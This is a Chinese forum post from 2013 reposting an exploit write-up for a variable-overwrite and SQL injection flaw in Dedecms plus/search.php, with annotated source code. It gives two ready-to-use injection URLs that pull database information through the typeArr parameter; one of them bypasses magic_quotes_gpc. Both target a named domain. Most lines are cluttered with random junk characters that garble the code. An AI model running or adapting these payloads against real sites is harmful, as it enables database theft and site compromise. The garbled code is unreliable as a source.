微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.
, f8 t( u5 N& U( L# E作者: c4rp3nt3r@0x50sec.org
+ L- |$ R& v; z8 m& Q5 G& dDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
) L* S. E* C/ K7 }. ^$ O 8 Z7 G) R9 y1 s1 `7 x: k
黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧. K% Q2 ^0 n) }. W- P+ p1 o
8 }/ R" f7 I0 x============+ h; J" J0 P2 a8 q! {7 G8 S; T
]3 K- c6 k* N* j! Q6 j
& L3 @7 V# R# ^& jDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
/ A3 {! L6 Z/ i8 s
, t3 X7 [. z7 y" k5 a+ q& w: L5 irequire_once(dirname(__FILE__).”/../include/common.inc.php”);4 V. Z4 X$ [) i) j6 \6 g( b' K
require_once(DEDEINC.”/arc.searchview.class.php”);2 `! C. _' Y4 u/ B, `5 z8 J5 k7 k3 r
& P* X$ f; ~) T, D1 I( x$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
5 {: ]: L& x; ?+ M) H! X8 i2 c( `$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
2 K1 u0 p8 i* W. Z) {; B$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
, Q5 x+ j9 a. W5 a9 c, R! X$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;4 p2 [' }+ y. k
$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;
4 X; ~0 C) G2 ?& D. M 2 n* R+ Y ~1 Q* [( Z) o
if(!isset($orderby)) $orderby=”;! o. Z7 u$ b7 ]# T8 B
else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);6 Q/ B$ ]9 t! o
5 Z" ?) H5 y/ a+ h . Q) i* u2 {; ?. _7 k2 Q Z% X5 ?
if(!isset($searchtype)) $searchtype = ‘titlekeyword’;) V' Y0 e8 C6 Z& M
else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);' Z& x* q3 a; B# @5 e) {! N9 h
# l. s* I! k) t* {2 Mif(!isset($keyword)){
( q! p9 W0 b0 ]) B. I* d4 v if(!isset($q)) $q = ”;. `& {: ~# C! X2 Y9 Q( n$ M: ~
$keyword=$q;2 ]" ?$ s! X0 `$ S
}$ x7 G4 V) [! u& A
; U* u, o6 a/ L* n$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));
$ m# g5 w4 J9 @, t; w
6 G9 c* r) B; M1 ]6 U" P//查找栏目信息# A0 l; P8 }6 w7 S" b
if(empty($typeid)) g+ b- A; y* f0 b# | D
{ o4 h+ j4 j: H6 D7 S, _1 M% I2 u1 _
$typenameCacheFile = DEDEDATA.’/cache/typename.inc’;0 ?1 N# H( [3 |
if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) ). H" E+ _1 K6 F
{
9 X8 s- T; L; `4 F $fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
& Y0 O4 r+ q) T# ` fwrite($fp, “<”.”?php\r\n”);
8 G1 S: N+ v$ Y $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);4 I3 s) H# \6 d( d6 b. b
$dsql->Execute();6 H; j1 |( M" W! r; J
while($row = $dsql->GetArray())5 x8 S6 C3 ^7 b @6 j9 T
{
) F* Q P9 d/ A1 S fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);# p+ ?4 X* J, M* p
}0 {( f6 ]" f" N; P
fwrite($fp, ‘?’.'>’);- B" c o( Z4 f5 @' M, n1 u- Z
fclose($fp);; i1 w7 W& X C5 m) \# L1 t- J+ U
}
- ]5 Y; G3 \% f //引入栏目缓存并看关键字是否有相关栏目内容9 \9 C( p( O+ T8 y0 l. u
require_once($typenameCacheFile);
+ a, y; i; U/ N! Q$ @//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个# I% o4 g9 O( g. ~" B- d
//
: d! r r2 X. K( v9 |# k$ x1 i( r0 p( Y if(isset($typeArr) && is_array($typeArr))
d( d# A- m, I4 b {5 ^+ L0 @9 J2 \4 G; l f* P4 \. z
foreach($typeArr as $id=>$typename)$ n- i, R+ j) D3 U5 B- _0 j6 f
{
0 o; g+ h) R: m& }' S, z2 V2 y
* X7 l( u: G# N4 v- u <font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过; h1 g6 y/ e, M- \4 \8 N
if($keyword != $keywordn)- M) @5 _/ W/ o: R. g0 h8 @
{
5 ^9 g/ W! f) T J+ Y, g, b- Q( J $keyword = $keywordn;
2 d3 i7 `- B( O$ C8 K <font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设
1 p% g# {( \1 \9 ~- o3 r3 H" ^ break;
0 V& t7 c+ @- ~# D/ {: O6 g3 p }
( J5 V- ]3 B' w, N }& l( h2 c6 ^+ I. l
}
( B3 X i- ]2 |# t) W/ q1 M9 U}, Y4 c2 `/ q$ @" [
然后plus/search.php文件下面定义了一个 Search类的对象 .' {* v3 t) R( r; |6 z9 v, E5 d
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.
5 E! G1 y/ ~0 ~; v9 B$this->TypeLink = new TypeLink($typeid);* i/ [& u- t# E
( e) W- w I- P5 p
TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.1 e9 u6 |- ]* `5 s- E9 @" {
) e4 o; j7 M2 m2 jclass TypeLink
0 k/ t, M! y7 G% W{
6 E2 ^$ Q2 \( q+ Z& @ var $typeDir;4 X2 J; t" }7 J$ S
var $dsql;' L4 p e7 T& L/ f- i: k: _
var $TypeID;* o; o- V# H1 \4 H5 g: S6 p1 B
var $baseDir;6 c0 K6 X' ~' k
var $modDir;* e7 d: h) k* \% h! Z2 n( f
var $indexUrl;; L- E4 E" A& ^5 S7 D1 N
var $indexName;' N( u# h0 ]6 w9 b" n- J8 l4 }" F
var $TypeInfos;1 C, K) V3 [ ^! E0 ^
var $SplitSymbol;& o0 N l. o+ B( L( k; z2 S) |
var $valuePosition;
y% k' }! Z/ m var $valuePositionName;+ E4 L# ]' z* w# D ?& v
var $OptionArrayList;//构造函数///////
3 N# P0 |5 W! X' K+ @9 `) w //php5构造函数
* T0 @$ |) Y9 l" \3 N+ d function __construct($typeid)
7 J" s2 E. c) f8 D$ y* C { d# V) p; r" ?% o. K
$this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];
( e f, y0 t% F0 _* q $this->indexName = $GLOBALS['cfg_indexname'];
' U! T% f. z) q K3 B, @, u $this->baseDir = $GLOBALS['cfg_basedir'];
, B; D: f0 G6 z- n" O $this->modDir = $GLOBALS['cfg_templets_dir'];
' l6 i( W+ M. t% x: Q( h9 M $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
5 ~; j3 ]; q8 r4 c& @: I $this->dsql = $GLOBALS['dsql'];
# ^+ m0 b) B0 c1 x; w, F! J $this->TypeID = $typeid;
% h3 d* [8 \( s6 B6 ?' h $this->valuePosition = ”;$ U k7 h# g* E( O `
$this->valuePositionName = ”;
! i/ x1 m k5 [& h6 w) {7 n $this->typeDir = ”;
/ t S/ c% v) Y$ p; d $this->OptionArrayList = ”;
& d; k+ s! Q" F# C
# m# N: `' o- c8 r9 @! V9 k //载入类目信息* b# s" L; I5 |
a' n |) [0 |
<font color=”Red”>$query = “SELECT tp.*,ch.typename as
# B# J2 ~3 t! l$ B: A6 Rctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join$ R/ @* z& t' k) ^ v
`#@__channeltype` ch
4 Q( O# W) v1 }2 S0 A$ [2 ] on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿
]2 a# y( U0 J
1 v! u/ F {6 g N if($typeid > 0)1 n1 }* r8 F. L: D- l" h
{! J& K8 I+ q% S5 J* w% y1 k
$this->TypeInfos = $this->dsql->GetOne($query);2 x8 ?) Z- B4 K3 _8 ^ v" e0 t
利用代码一 需要 即使magic_quotes_gpc = Off# l8 s3 `! h/ a+ F8 M4 Z# `9 s
* @+ r5 A2 J! Z. v- L- X
www.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
) A. [9 e, E, X& Q! t3 k
3 z8 m( w- {, \1 m6 }& P$ V这只是其中一个利用代码… Search 类的构造函数再往下
& W! V. m, q- r/ S9 X1 a7 ?: r
) b4 g( q6 g. m' R% }, {……省略# |* K7 K X: D$ q
$this->TypeID = $typeid;
7 a. S2 k& q1 e. u! k……省略: K# [ B3 Y% d! K
if($this->TypeID==”0″){
3 y# J5 q0 X3 t- F- u) o $this->ChannelTypeid=1;
" E6 F; ~4 V( L3 M1 V }else{
& ?& \" \! ^ A* P9 Q $row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲) t) Q5 l h/ O/ o0 d5 [
//现在不鸡肋了吧亲…% v: M3 r- J, M6 o# s
$this->ChannelTypeid=$row['channeltype'];3 O5 R- `$ L4 s' c3 n( D1 |
+ Q; V4 J3 B5 D$ B! j% o% v M4 P }
% @3 F6 P" D0 L* C4 _, I& U利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.6 I) M9 A* E" h# f, b
( P# t E' W; a6 O& C( E& h. A B" Ywww.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
0 N* |& H. j; ?7 \ F& U* [. M% o- l ' }$ G' P7 L' @$ A
如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站
" ~9 ]- G" N( x" G" H3 X |
发表于 2013-1-19 08:18:56
收藏
支持
反对